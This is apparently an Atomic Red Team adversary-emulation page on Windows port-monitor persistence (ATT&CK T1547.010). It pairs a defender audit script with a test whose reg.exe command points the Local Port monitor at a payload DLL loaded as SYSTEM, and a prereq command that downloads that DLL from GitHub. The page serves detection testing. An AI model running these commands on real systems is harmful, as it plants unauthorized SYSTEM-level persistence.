
Port Monitors

Description from ATT&CK

Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

  • Local Port
  • Standard TCP/IP Port
  • USB Monitor
  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
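An added defender-side audit (not code from the Atomic Red Team page or from ATT&CK) that walks the Print\Monitors key described above and flags any Driver value that differs from the default monitor DLLs, resolves outside System32, or is not carried by a valid Microsoft signature. Beyond localspl.dll, which the page names, the default driver names in the baseline and the use of Get-AuthenticodeSignature as the signing check are assumptions to confirm against a known-good host.

```powershell
# Added audit script (not from the Atomic Red Team page): list port monitors and flag
# Driver values that deviate from defaults, load from outside System32, or are unsigned.
$MonitorsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors'
$System32    = Join-Path $env:SystemRoot 'System32'

# Expected monitor -> driver pairs; localspl.dll comes from the page, the rest are
# assumed defaults and should be confirmed against a known-good host.
$Baseline = @{
    'Local Port'           = 'localspl.dll'
    'Standard TCP/IP Port' = 'tcpmon.dll'
    'USB Monitor'          = 'usbmon.dll'
    'WSD Port'             = 'WSDMon.dll'
}

function Test-PortMonitors {
    param([string]$Key = $MonitorsKey)
    foreach ($sub in Get-ChildItem -Path $Key -ErrorAction Stop) {
        $name     = $sub.PSChildName
        $driver   = (Get-ItemProperty -Path $sub.PSPath -Name Driver -ErrorAction SilentlyContinue).Driver
        $findings = @()
        if (-not $driver) {
            $findings += 'no Driver value'
        } else {
            # A bare file name is loaded from System32; a fully qualified path is loaded as written.
            $path = if ([System.IO.Path]::IsPathRooted($driver)) { $driver } else { Join-Path $System32 $driver }
            if (-not $Baseline.ContainsKey($name)) {
                $findings += 'monitor not in baseline'
            } elseif ($Baseline[$name] -ne $driver) {
                $findings += "driver changed from $($Baseline[$name])"
            }
            if (-not $path.StartsWith($System32, [System.StringComparison]::OrdinalIgnoreCase)) {
                $findings += 'driver outside System32'
            }
            if (-not (Test-Path -LiteralPath $path)) {
                $findings += 'driver file missing'
            } else {
                $sig = Get-AuthenticodeSignature -FilePath $path
                if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft') {
                    $findings += "signature $($sig.Status)"
                }
            }
        }
        [pscustomobject]@{ Monitor = $name; Driver = $driver; Findings = ($findings -join '; ') }
    }
}

# Print only entries with findings; an empty table means every monitor matches the baseline.
Test-PortMonitors | Where-Object { $_.Findings } | Format-Table -AutoSize
```

Run from an elevated PowerShell session; after executing Atomic Test #1 the Local Port entry should appear with "driver changed from localspl.dll" and "driver outside System32", and disappear again once the cleanup command runs.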

Atomic Tests

Atomic Test #1 - Change Windows Default Print Monitor

Register a malicious dll as a port monitor by changing the registry key. This can be used for persistence or privilege escalation.

Supported Platforms: windows

auto_generated_guid: 0778f116-a748-49c6-9633-122401744b26

Inputs:

  • Name: dll_payload
  • Description: DLL to inject
  • Type: Path
  • Default Value: PathToAtomicsFolder\T1547.010\src\x64\T1547.dll

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

rem Point the Local Port monitor's Driver value at the test DLL; spoolsv.exe loads it on its next start
reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d "#{dll_payload}" /f

Cleanup Commands:

rem Restore the default Local Port monitor driver
reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d localspl.dll /f

Dependencies: Run with powershell!

Description: T1547.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}

Get Prereq Commands:

# Create the target directory if needed, then fetch the test DLL from the Atomic Red Team repository
New-Item -Type Directory (Split-Path "#{dll_payload}") -ErrorAction Ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.010/src/x64/T1547.dll" -OutFile "#{dll_payload}"
